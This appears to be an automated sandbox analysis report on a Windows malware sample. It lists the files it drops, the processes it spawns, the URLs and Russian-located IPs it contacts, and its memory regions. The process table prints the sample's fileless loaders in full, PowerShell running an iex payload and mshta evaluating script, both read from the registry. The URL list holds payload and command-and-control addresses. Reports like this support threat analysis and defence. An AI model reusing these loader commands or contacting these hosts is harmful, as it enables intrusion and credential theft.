Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
EJ6FBXJ9Dg.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\LocalLow\freebl3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\mozglue.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\nss3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\softokn3.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\sqlite3.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jv54rgf4.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mkr2iq4u.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\XHSRZM23.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\2If3OY9WA2aU
|
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie
0x3d, schema 4, UTF-8, version-valid-for 3
|
dropped
|
||
C:\Users\user\AppData\LocalLow\msvcp140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\pU97tg112OjD
|
SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages
2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
|
dropped
|
||
C:\Users\user\AppData\LocalLow\sF9O6f0cCdbK
|
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie
0x19, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\LocalLow\vcruntime140.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\LocalLow\y3enbS6322L5
|
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie
0x3d, schema 4, UTF-8, version-valid-for 3
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESF206.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 06:49:52 2022,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESFF35.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 06:49:56 2022,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_isg504bu.mfz.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtb51wp4.4ti.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jv54rgf4.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jv54rgf4.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\mkr2iq4u.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mkr2iq4u.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
|
modified
|
There are 18 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\EJ6FBXJ9Dg.exe
|
C:\Users\user\Desktop\EJ6FBXJ9Dg.exe
|
||
C:\Users\user\AppData\Roaming\XHSRZM23.exe
|
"C:\Users\user\AppData\Roaming\XHSRZM23.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nhefowhe -value gp; new-alias -name ucvjneg -value
iex; ucvjneg ([System.Text.Encoding]::ASCII.GetString((nhefowhe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mkr2iq4u.cmdline
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jv54rgf4.cmdline
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ndam='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ndam).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF206.tmp"
"c:\Users\user\AppData\Local\Temp\CSCC9AB450BCFA441ED9B999D6FD5DE3822.TMP"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFF35.tmp"
"c:\Users\user\AppData\Local\Temp\CSC20F2306B39284E32B5AB6E9725E2189D.TMP"
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://188.127.227.51/
|
188.127.227.51
|
||
http://188.127.227.51/49d6ec0cd113efb59453fa49c7f2abcd
|
188.127.227.51
|
||
http://45.8.158.104/uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/gkKIfJKu9W/RfGqkB9ODhAT7t3c5/NgU9QmTJW10x/ljH6Rbwk6Te/NQKogNebUNXkBe/OP8YU_2BPfX7w7JRWnzlY/DYJ2tPBGUU9yVi7O/2UHx3wnrI8usjfi/mEy_2FvxgACU_2BVfF/k_2BhGhcG/DY4c1ymhU_2BCF0kWEYq/M0_2B_2F16h_2BgoOGF/9_2FtG_2F6BZfr3nq2A72O/TaGtamWcSmCx5/BKV7x7CGne61RjWS63/G.pct
|
45.8.158.104
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.mozilla.com/en-US/blocklist/
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://constitution.org/usdeclar.txtC:
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://search.yahoo.com?fr=crmas_sfpf
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://https://file://USER.ID%lu.exe/upd
|
unknown
|
||
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
|
unknown
|
||
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://45.8.158.104/uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qf
|
unknown
|
||
https://www.vign.
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://search.yahoo.com?fr=crmas_sfp
|
unknown
|
||
http://45.8.158.104/uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyD
|
unknown
|
||
http://constitution.org/usdeclar.txt
|
unknown
|
||
http://45.8.158.104/uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qfwxbX9aDBL1/IeT5piixzi8h4SRl9u/8_2B0Atg2/EH_2BuWU2tSI81tfObAy/vUlIlX4Ry5a2Lkg_2BA/WrsB69Jk6Nr0AfUnViCZgr/xOQsHH2r7bRf4/GbUKvAO_/2B_2BNCAwjUDjs1PnMfwFho/BSlcplWuk_/2ByFg1B7Jha7Qhk7w/kMamT9D_2B57/Uw_2B3UVmpC/BA7AL3JebG7W65/8MiRPWVyAeG2AtQC9YkgU/qP7k.pct
|
45.8.158.104
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://qpdownloads.com/10103.exe
|
31.31.198.19
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://trackingg-protectioon.cdn1.mozilla.net/uploaded/1nOLBbA4MMg8uH2db9T/AXce5fVRPsPAKOJdUYw5Yz/f6
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
http://45.8.158.104/uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/g
|
unknown
|
||
https://mozilla.org0
|
unknown
|
||
http://www.sqlite.org/copyright.html.
|
unknown
|
||
http://45.8.158.104/uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyDXRc_2B/ixVyFqQK/k126u_2B_2Ba_2BruFx1_2F/jniVE8w7fc/bk1R9cvUDCNSr3LVX/6pZVXtyVf482/WFP0247XYM7/A2gUdzKCCOqwfV/Gv8pnlgo2_2FOJ3S2ifKR/bqy_2FBRKHq_2Fpg/Vdjwqlx7uWisr2l/fEIsbd32W_2FSgiOj7/dytSGoyJO/SSfkZcDtemeWWSjAjk_2/FpEHeBUMQUi3yJQSNuD/_2FtYwM7I7Bk/pKYwZ.pct
|
45.8.158.104
|
There are 26 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
qpdownloads.com
|
31.31.198.19
|
||
trackingg-protectioon.cdn1.mozilla.net
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
188.127.227.51
|
unknown
|
Russian Federation
|
||
45.8.158.104
|
unknown
|
Russian Federation
|
||
31.31.198.19
|
qpdownloads.com
|
Russian Federation
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
992000
|
heap
|
page read and write
|
||
24ABD467000
|
trusted library allocation
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
24AC5DCC000
|
unkown
|
page read and write
|
||
12AC000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
1429000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
13AA000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
112F000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
24AC56F0000
|
direct allocation
|
page execute and read and write
|
||
14A8000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
992000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
24ABDA02000
|
trusted library allocation
|
page read and write
|
||
3FD7000
|
trusted library allocation
|
page read and write
|
||
294E6BEB000
|
direct allocation
|
page read and write
|
||
1DEADF00000
|
trusted library allocation
|
page read and write
|
||
24AC5740000
|
heap
|
page read and write
|
||
1C68B738000
|
heap
|
page read and write
|
||
469000
|
unclassified section
|
page readonly
|
||
1F0000
|
trusted library allocation
|
page read and write
|
||
24AC56E0000
|
trusted library section
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
294E52C7000
|
heap
|
page read and write
|
||
24AAB400000
|
heap
|
page read and write
|
||
99C000
|
heap
|
page read and write
|
||
24AC578E000
|
heap
|
page read and write
|
||
1C68B6E1000
|
heap
|
page read and write
|
||
22C51ABC000
|
heap
|
page read and write
|
||
294E5345000
|
heap
|
page read and write
|
||
2244CD7A000
|
heap
|
page read and write
|
||
18028D4A000
|
heap
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
22C4F743000
|
heap
|
page read and write
|
||
3FDE000
|
trusted library allocation
|
page read and write
|
||
2244CB50000
|
heap
|
page read and write
|
||
294E52E6000
|
heap
|
page read and write
|
||
24AB0707000
|
trusted library allocation
|
page read and write
|
||
294E5420000
|
heap
|
page read and write
|
||
7FF817EBD000
|
trusted library allocation
|
page execute and read and write
|
||
5E22C7A000
|
stack
|
page read and write
|
||
2244CD7D000
|
heap
|
page read and write
|
||
397A000
|
trusted library allocation
|
page read and write
|
||
9BA000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24AC5540000
|
heap
|
page execute and read and write
|
||
480000
|
heap
|
page read and write
|
||
7FF818150000
|
trusted library allocation
|
page read and write
|
||
24AB117B000
|
trusted library allocation
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
7FF817EB4000
|
trusted library allocation
|
page read and write
|
||
957000
|
heap
|
page read and write
|
||
1C68B6F2000
|
heap
|
page read and write
|
||
92A000
|
heap
|
page read and write
|
||
22C51ACD000
|
heap
|
page read and write
|
||
2244CC4D000
|
heap
|
page read and write
|
||
24AC5697000
|
trusted library allocation
|
page read and write
|
||
24AC578E000
|
heap
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
22C51ABC000
|
heap
|
page read and write
|
||
9C4000
|
heap
|
page read and write
|
||
1C68B6DA000
|
heap
|
page read and write
|
||
5E225D5000
|
stack
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
24ABE6E2000
|
trusted library allocation
|
page read and write
|
||
24AAB49B000
|
heap
|
page read and write
|
||
24AB0C59000
|
trusted library allocation
|
page read and write
|
||
7FF818260000
|
trusted library allocation
|
page read and write
|
||
2244CD22000
|
heap
|
page read and write
|
||
7FF818094000
|
trusted library allocation
|
page read and write
|
||
5E22D37000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2244CC30000
|
trusted library allocation
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
294E5160000
|
remote allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
1C68B7A0000
|
heap
|
page read and write
|
||
2244CCF3000
|
heap
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
294E5322000
|
heap
|
page read and write
|
||
1DEADD81000
|
heap
|
page read and write
|
||
24ABD4D5000
|
trusted library allocation
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
7FF818052000
|
trusted library allocation
|
page read and write
|
||
22C51AAC000
|
heap
|
page read and write
|
||
560000
|
trusted library allocation
|
page read and write
|
||
24AB0F85000
|
trusted library allocation
|
page read and write
|
||
22C51ABF000
|
heap
|
page read and write
|
||
9D6000
|
heap
|
page read and write
|
||
1C68B72B000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
2244CCFD000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
3ECE000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
9BCBFF000
|
stack
|
page read and write
|
||
22C4EDE0000
|
heap
|
page read and write
|
||
1DEADD84000
|
heap
|
page read and write
|
||
24AC5838000
|
heap
|
page read and write
|
||
24ABE4E2000
|
trusted library allocation
|
page read and write
|
||
22C4F6F6000
|
heap
|
page read and write
|
||
B0AE3F7000
|
stack
|
page read and write
|
||
24AC569B000
|
trusted library allocation
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
5E23A8E000
|
stack
|
page read and write
|
||
24AACE30000
|
trusted library allocation
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
1C68B712000
|
heap
|
page read and write
|
||
24AADDF2000
|
trusted library allocation
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
3FD7000
|
trusted library allocation
|
page read and write
|
||
22C4F707000
|
heap
|
page read and write
|
||
294E52CA000
|
heap
|
page read and write
|
||
294E5332000
|
heap
|
page read and write
|
||
3AAF000
|
stack
|
page read and write
|
||
294E6C30000
|
direct allocation
|
page read and write
|
||
7FF81806C000
|
trusted library allocation
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
9CA000
|
heap
|
page read and write
|
||
2244CD0A000
|
heap
|
page read and write
|
||
920000
|
heap
|
page read and write
|
||
1C68B800000
|
direct allocation
|
page read and write
|
||
1DEADE40000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
1C68B6DF000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
2244CD59000
|
heap
|
page read and write
|
||
3F8000
|
heap
|
page read and write
|
||
294E52B0000
|
heap
|
page read and write
|
||
38B1000
|
heap
|
page read and write
|
||
9B5000
|
heap
|
page read and write
|
||
1C68B74C000
|
heap
|
page read and write
|
||
2244CCDB000
|
heap
|
page read and write
|
||
369F000
|
stack
|
page read and write
|
||
9E1000
|
heap
|
page read and write
|
||
3FC6000
|
trusted library allocation
|
page read and write
|
||
24AC5785000
|
heap
|
page read and write
|
||
2244CD32000
|
heap
|
page read and write
|
||
24AC59A0000
|
trusted library allocation
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
359E000
|
stack
|
page read and write
|
||
3FDE000
|
trusted library allocation
|
page read and write
|
||
1C68B747000
|
heap
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
294E5338000
|
heap
|
page read and write
|
||
6BC000
|
heap
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
24AC5950000
|
unkown
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
9CD000
|
heap
|
page read and write
|
||
22C4F747000
|
heap
|
page read and write
|
||
FFE000
|
stack
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
24AC56A0000
|
heap
|
page execute and read and write
|
||
22C4F766000
|
heap
|
page read and write
|
||
22C4F6F6000
|
heap
|
page read and write
|
||
24AACFDF000
|
heap
|
page read and write
|
||
957000
|
heap
|
page read and write
|
||
294E52C7000
|
heap
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
7C5000
|
trusted library allocation
|
page read and write
|
||
24AACF6D000
|
heap
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
2244CD3E000
|
heap
|
page read and write
|
||
24AC5847000
|
heap
|
page read and write
|
||
24AAD248000
|
trusted library allocation
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
1DEADF95000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
860000
|
heap
|
page read and write
|
||
24AB1161000
|
trusted library allocation
|
page read and write
|
||
2244CD3B000
|
heap
|
page read and write
|
||
24AB076D000
|
trusted library allocation
|
page read and write
|
||
2244CFE0000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
406000
|
unkown
|
page readonly
|
||
19C87F80000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
5E229FE000
|
stack
|
page read and write
|
||
2244CD7A000
|
heap
|
page read and write
|
||
5E23B0E000
|
unkown
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
14AC000
|
heap
|
page read and write
|
||
5E22DB8000
|
stack
|
page read and write
|
||
1C68D080000
|
direct allocation
|
page read and write
|
||
24AB0FB3000
|
trusted library allocation
|
page read and write
|
||
22C51AB9000
|
heap
|
page read and write
|
||
2244CD3B000
|
heap
|
page read and write
|
||
24AC5960000
|
trusted library allocation
|
page read and write
|
||
22C51AD5000
|
heap
|
page read and write
|
||
3FEC000
|
trusted library allocation
|
page read and write
|
||
24AC56F2000
|
trusted library allocation
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
1C68B6A0000
|
heap
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
22C51AD6000
|
heap
|
page read and write
|
||
6F9000
|
stack
|
page read and write
|
||
24AB1172000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
1004FF000
|
stack
|
page read and write
|
||
193B7FE000
|
stack
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
6B7000
|
heap
|
page read and write
|
||
24AC5691000
|
trusted library allocation
|
page read and write
|
||
294E80A2000
|
direct allocation
|
page read and write
|
||
1DEADFA0000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
3FB0000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
294E52E1000
|
heap
|
page read and write
|
||
97D000
|
heap
|
page read and write
|
||
3EB0000
|
trusted library allocation
|
page read and write
|
||
30000
|
heap
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
1C68B74F000
|
heap
|
page read and write
|
||
22C4EDA8000
|
trusted library allocation
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
460000
|
unclassified section
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
7FF818110000
|
trusted library allocation
|
page read and write
|
||
24AC5691000
|
trusted library allocation
|
page read and write
|
||
1C68B6A9000
|
heap
|
page read and write
|
||
2244CD3C000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
22C4F762000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
22C51AB9000
|
heap
|
page read and write
|
||
22C4EEF0000
|
trusted library allocation
|
page read and write
|
||
294E52C6000
|
heap
|
page read and write
|
||
7FF818230000
|
trusted library allocation
|
page read and write
|
||
2244CD51000
|
heap
|
page read and write
|
||
1C68B736000
|
heap
|
page read and write
|
||
1C68B730000
|
heap
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
79F633B000
|
stack
|
page read and write
|
||
22C4F743000
|
heap
|
page read and write
|
||
2CEF000
|
stack
|
page read and write
|
||
38B0000
|
heap
|
page read and write
|
||
2244CCDB000
|
heap
|
page read and write
|
||
24ABD506000
|
trusted library allocation
|
page read and write
|
||
1C68D03B000
|
direct allocation
|
page read and write
|
||
18028B60000
|
heap
|
page read and write
|
||
2244CCFD000
|
heap
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
294E52E6000
|
heap
|
page read and write
|
||
22C4E984000
|
heap
|
page read and write
|
||
294E52D1000
|
heap
|
page read and write
|
||
24AC56E0000
|
trusted library allocation
|
page read and write
|
||
38B4000
|
trusted library allocation
|
page read and write
|
||
29EA000
|
stack
|
page read and write
|
||
24AC578E000
|
heap
|
page read and write
|
||
7FF818100000
|
trusted library allocation
|
page read and write
|
||
B00000
|
unkown
|
page read and write
|
||
6D2000
|
heap
|
page read and write
|
||
24ABE32A000
|
trusted library allocation
|
page read and write
|
||
22C51AC3000
|
heap
|
page read and write
|
||
2D2E000
|
stack
|
page read and write
|
||
C0E000
|
stack
|
page read and write
|
||
24AACFDC000
|
heap
|
page read and write
|
||
1C68B74C000
|
heap
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
951000
|
heap
|
page read and write
|
||
24ABDBE2000
|
trusted library allocation
|
page read and write
|
||
24AC5776000
|
heap
|
page read and write
|
||
2244CD16000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
2244CD27000
|
heap
|
page read and write
|
||
24ABE50A000
|
trusted library allocation
|
page read and write
|
||
24AACDF0000
|
heap
|
page readonly
|
||
2244CD53000
|
heap
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
193B9FE000
|
stack
|
page read and write
|
||
1DEADEA0000
|
trusted library allocation
|
page read and write
|
||
24AC5970000
|
trusted library allocation
|
page read and write
|
||
24AC56F2000
|
trusted library allocation
|
page read and write
|
||
7C3000
|
trusted library allocation
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
22C4ED9F000
|
trusted library allocation
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
24ABDBDD000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
7FF8180A0000
|
trusted library allocation
|
page execute and read and write
|
||
22C51AC3000
|
heap
|
page read and write
|
||
294E8070000
|
direct allocation
|
page read and write
|
||
22C51AA8000
|
heap
|
page read and write
|
||
1C68B6D7000
|
heap
|
page read and write
|
||
22C4EDA1000
|
trusted library allocation
|
page read and write
|
||
24AAB51B000
|
heap
|
page read and write
|
||
22C4F75A000
|
heap
|
page read and write
|
||
24ABD657000
|
trusted library allocation
|
page read and write
|
||
AF0000
|
unkown
|
page readonly
|
||
22C51ABF000
|
heap
|
page read and write
|
||
2244CD15000
|
heap
|
page read and write
|
||
24ABE322000
|
trusted library allocation
|
page read and write
|
||
7FF817EC3000
|
trusted library allocation
|
page read and write
|
||
733000
|
heap
|
page read and write
|
||
24AC5997000
|
trusted library allocation
|
page read and write
|
||
951000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
9BC73C000
|
stack
|
page read and write
|
||
404000
|
unkown
|
page write copy
|
||
14AB000
|
heap
|
page read and write
|
||
880000
|
heap
|
page read and write
|
||
22C4F751000
|
heap
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
3FEC000
|
trusted library allocation
|
page read and write
|
||
2244CD61000
|
heap
|
page read and write
|
||
294E5160000
|
remote allocation
|
page read and write
|
||
9C4000
|
heap
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
9DE000
|
heap
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
294E6BD7000
|
direct allocation
|
page read and write
|
||
24ABE6F2000
|
trusted library allocation
|
page read and write
|
||
7FF817FD0000
|
trusted library allocation
|
page execute and read and write
|
||
10B0000
|
heap
|
page read and write
|
||
24AAD3F2000
|
trusted library allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
3FD6000
|
trusted library allocation
|
page read and write
|
||
345C000
|
stack
|
